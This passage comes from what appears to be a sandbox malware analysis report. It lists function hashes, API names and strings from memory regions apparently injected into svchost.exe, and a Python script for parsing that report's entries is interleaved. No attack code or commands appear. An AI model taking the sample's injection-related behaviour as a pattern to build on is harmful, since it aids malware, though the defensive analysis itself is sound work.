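• Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction ID: 0442a4f2f429f8f48b690bb4eb5025a919f4eba2242cb7c6428bdf88597eaeb6
• Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction Fuzzy Hash: DAD1AD72644B408FEF609F65D48C3DD77A0F7A6BA8F020216EE8957B96DB38D499C700
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction ID: 97df6bae4fd4c272dad566c70eca623a2d67dd5b8b7a4d677d9b7fd89218708b
• Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction Fuzzy Hash: 7CD1CF72A00BA08EEF60DF65D48C3DD77A0F7A9BA8F120115EE8957B96DB34D489C700
APIs
• FlsGetValue.KERNEL32(?,?,?,00000216819BCD4E,?,?,?,?,?,?,?,?,00000216819BD50D,?,?,00000001), ref: 00000216819BD5F7
• FlsSetValue.KERNEL32(?,?,?,00000216819BCD4E,?,?,?,?,?,?,?,?,00000216819BD50D,?,?,00000001), ref: 00000216819BD616
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
• Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
• Instruction ID: 023bd0c4fd2a4507a0837e78a07aff7af5b620e54b3f1399547a36c97c6cd93f
• Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
• Instruction Fuzzy Hash: BD119430704670C9FE58A722A55D3ED61CA6F647F8F178335A87D477DAEE28C8094700
"""

# "• Key: value" lines of the Similarity / Memory Dump Source blocks.
FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
# "• Api.MODULE(args), ref: ADDRESS" lines of the APIs block.
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
# Value of the Source File field: dump name, load offset, PE flag.
SOURCE_RE = re.compile(r"^(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)$")


def parse_functions(text):
    """Split the report text into one dict per function.

    A function's APIs block precedes its Memory Dump Source block, and the
    Instruction Fuzzy Hash field is always the last line of a function, so
    that field closes the current record.
    """
    functions = []
    cur = {"apis": []}
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            cur["apis"].append({"api": m.group(1), "module": m.group(2),
                                "args": m.group(3), "ref": int(m.group(4), 16)})
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue  # headings, graph legends, blank lines
        key, value = m.group(1), m.group(2)
        if key == "Source File":
            s = SOURCE_RE.match(value)
            if s:
                cur["dump"] = s.group(1)
                cur["offset"] = int(s.group(2), 16)
                cur["based_on_pe"] = s.group(3) == "true"
        else:
            cur[key.lower().replace(" ", "_")] = value
        if key == "Instruction Fuzzy Hash":
            functions.append(cur)
            cur = {"apis": []}
    return functions


def shared_opcode_ids(functions):
    """Opcode IDs found at more than one dump offset: identical code lifted
    from several memory regions (here, two injected regions of svchost)."""
    seen = defaultdict(set)
    for f in functions:
        seen[f["opcode_id"]].add(f["offset"])
    return {oid: sorted(offs) for oid, offs in seen.items() if len(offs) > 1}


def apis_by_module(functions):
    """Resolved imports across all functions, grouped by module name."""
    out = defaultdict(set)
    for f in functions:
        for a in f["apis"]:
            out[a["module"]].add(a["api"])
    return {mod: sorted(names) for mod, names in out.items()}


if __name__ == "__main__":
    funcs = parse_functions(REPORT_EXCERPT)
    for oid, offsets in shared_opcode_ids(funcs).items():
        print(oid[:16], [hex(o) for o in offsets])
    print(apis_by_module(funcs))
```

Run against the whole report text rather than the excerpt, the same three functions give the complete picture: `shared_opcode_ids` flags the CRT code duplicated between the two svchost regions, and `apis_by_module` yields the import set (the registry, heap and FLS calls seen in this section) that can be compared against the report's signature list.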
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction ID: f49bb9b9d80b117db9903789746e1270199453ebc1c1364e7fa6cde92d830728
• Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction Fuzzy Hash: 1E81D331B802418FFE54AF66B44D3DD66D1EBB5B80F4A80169A699F7D6DB38C84D8700

APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction ID: ba3c417bfb60e10b8c3c379fba3e1ee71c4e73dfb6e89b2352b27acafea1575d
• Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction Fuzzy Hash: 3A81F731B107618EFF5C9BA9A44D3ED22D0A7B5780F574225AA48C77D6EB38C94DC701

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
• Instruction ID: 31a5975f716846480eb05b1e16f4336731cd4458d17d25f082acd2214823b98f
• Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
• Instruction Fuzzy Hash: 77318C31212A60A9EE62DB42A80C7DD63E4BB69BB0F5B0625DD5D4B390EF39C48D8310

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
• Instruction ID: 9ce688ee93ba90ac0c84ef49c1703882f7e0d67c32f2dcf740e79a2fb6622ad8
• Opcode Fuzzy Hash: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
• Instruction Fuzzy Hash: ED118F32314A808AEB508B52F95C39D76A0F7E8FE5F054224EA9E87B94DF38C8188744

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
• Instruction ID: 5f9aef3c9174a1739a59fd907a99b75256bf9e1f006052577327139885cb0591
• Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
• Instruction Fuzzy Hash: 4A115B36704B508AEF24DB12F44C2AD62B0FB98B95F460029DE8D07B94EF3DC648C704

APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
• Instruction ID: 144a9ee46fec38c6331d903ef6d07f2e853d302d3e43114fb5f259d75b68a60e
• Opcode Fuzzy Hash: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
• Instruction Fuzzy Hash: 40D1A936205B9886EE70DB16E49839EB7A0F3D8B84F514216EACE477A9DF3CC545CB00

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Heap$Process$Free
• String ID: C:\Windows\System32\svchost.exe
• API String ID: 3168794593-3822071397
• Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
• Instruction ID: 00b32960d93923937e65119abd5c1dcf28b03c30f66026aa582642a902e3e0ba
• Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
• Instruction Fuzzy Hash: 59316BB7509AC09FFB558F66A85D28D2FA0F3E9F42F0B8016DAC403387EA2594098700

APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
• Instruction ID: 5c52ae74f7ddc9b508f2cc68e7077d448a61f197ea34f71a0585107c8f5e101b
• Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
• Instruction Fuzzy Hash: 4311B6303046708EFE58A732955D3ED72D66B687FCF164724A87A077DEDE68C8098340

APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
• Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
• Instruction ID: a785752bf74330900625d384dc3d620be5a3ebca11633b9af7793e05491854f5
• Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
• Instruction Fuzzy Hash: E8012931300A408AEB54DB52B85C79D63A1F798BC1F894035DE8943755DF3CC98D8740

APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
• Opcode ID: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
• Instruction ID: 51d672c049acfc95fcd196a18afc7f38eec3f9cc59ccf9b460144e796f14ae2b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0301E575611B408AEF24DB22F85C79E72B0BBA9B86F064128CA8D17765EF3DC54CC700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                • API String ID: 2719912262-4282027825
                                                                                                                                                                                                                                                • Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction ID: 8da5cbbe4d6bb8a14f153af897fbcda62d7ae12b9d5dd8853b881f13034b0831
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60F04F323046819AEF608B61F49C7DE67A0F768BC8F854130DA8946A55EF7CC68CCB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CombinePath
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3422762182-91387939
                                                                                                                                                                                                                                                • Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction ID: b73af96e8a47a6d0527908d1dc92b5a7b22636392e623753de926ac529fd503e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42F0A030714B9486EE148B13B91C19DA360EB6CFD0F098030EE8A07B19CF3CC58E8700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction ID: d4f988b161efeb3e7b7bff568bdd6eb425630b625771d81dfa5b61351f0dcb39
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44F06D71211A0486EF148B64F84C3AD6320FBA9BA1F550629DAAE462E4CF2CC44CC300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction ID: 229e00a9c465781b392b78cd0cd3bdf0c9b794ed1186bf7ea0b973ab56e0156d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC02CB36219B948AEB60CB55F49839EB7A1F3D5B94F114115EA8E87BA8DF7CC448CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction ID: be500c7dfdd4105a273f80a051afa8bbaeaa17ea96fb611f661f61d4486c925e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F61DB36619B54CAFB60CB15E49C39EB7A0F398784F514115EA8E87BA8DB7CC548CF00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: 0f0b95282461109e40faf74e68c7752b6b6c483ff8225b241b29f6271b1f12ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B311C676F61A000DFE651978D97E3ED31416F79374F0B0634A97E076EADA6C8ACD4200
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: f792815cef8b7c4627d9b2860fb30326119901529685bae8c5355aeba82124c1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction Fuzzy Hash: C511C436B50A518EFF642168EA4E3ED11506B793B8F0B0734BAF7076EECA28984D4200
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
• Instruction ID: c982b19fa4377e11e101d37bb51d771f761c7f3e7469a3702b1533c2db390b39
• Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
• Instruction Fuzzy Hash: FF51D332311620CEEF54CF25E48CBAC77A5F768B98F538125EA8A47788DB79C859C700
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
• Instruction ID: 57358ce0ebe6c39b2528c5d5abac73d57a6c78277dde2497c2f859897d371b04
• Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
• Instruction Fuzzy Hash: D161A273508BD48AEB718F15E4483DEB7A0F7A9B98F054215EB9903B99DB7CC198CB00
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
• Instruction ID: 458d5abda429c4ea281d79907b0f1732159f9f9538b4b2d9e279b25f0bd9240f
• Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
• Instruction Fuzzy Hash: 97518F365982808FEF749F25944C39C77A0F3A4BA4F1A8116DF8947BD5DB38D899CB01
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
• Instruction ID: 7a93ab4fe560e0e0a38271fa6d979a1deccc988d318c273572c6de70b1330f3b
• Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
• Instruction Fuzzy Hash: A9518D721046A0CEEF748F26998C39C77A1F365B98F1A4115DB8A87BD5CB78D4A8CB01
APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
• Instruction ID: 74df5f5ef537270e389c43e684c005ce16e03a9a293af8a84c23fafbf82ef783
• Opcode Fuzzy Hash: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
• Instruction Fuzzy Hash: BA318332701B658AEF54DF16E54C7AD67A0FB64B80F4A4020DF4C47B55EF38D4A98700
APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
• Opcode ID: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
• Instruction ID: 411f23bce3e88c341b72d7c991107ad7717c980a74ac115df9daba2b46d94ed8
• Opcode Fuzzy Hash: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
• Instruction Fuzzy Hash: E0D1BE32B15A808DEB21CFA9D5483EC37B1F364BD8F554216DE9DA7B99DA34C44AC340
APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
• Instruction ID: 0be8cfa03d53cb57b6abb7abcd1d48e644ceafe13a72ced1a6208489aef15a50
• Opcode Fuzzy Hash: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
• Instruction Fuzzy Hash: 9791CD727106948DFF60DF69988C3ED2BB0F764B88F164109DE8E67A94DB35C68AD700
APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
• Instruction ID: d2e308a2b4aa95d3dd345c71bd648825a65c40371fa9aafa37475373303f0a64
• Opcode Fuzzy Hash: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
• Instruction Fuzzy Hash: 44111832710B018AEF00DBA0E8583EC33A4F769758F450E21DA6D867A8EB78D1988340
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
• Instruction ID: e3e0ee880a66244a0dfdc49d4dab3b219d327fe8cecf664af1ce3d55310b2b4d
• Opcode Fuzzy Hash: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
• Instruction Fuzzy Hash: EC71B236200BA189EF34DF25989C3EE7798F7A5784F82012ADD4D47B89DB35E6498704
APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 3242871069-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: 09d03c6ab22edbb96724a3b4ca98121e83798b2f6441db1c3f75e410c3f6a88d
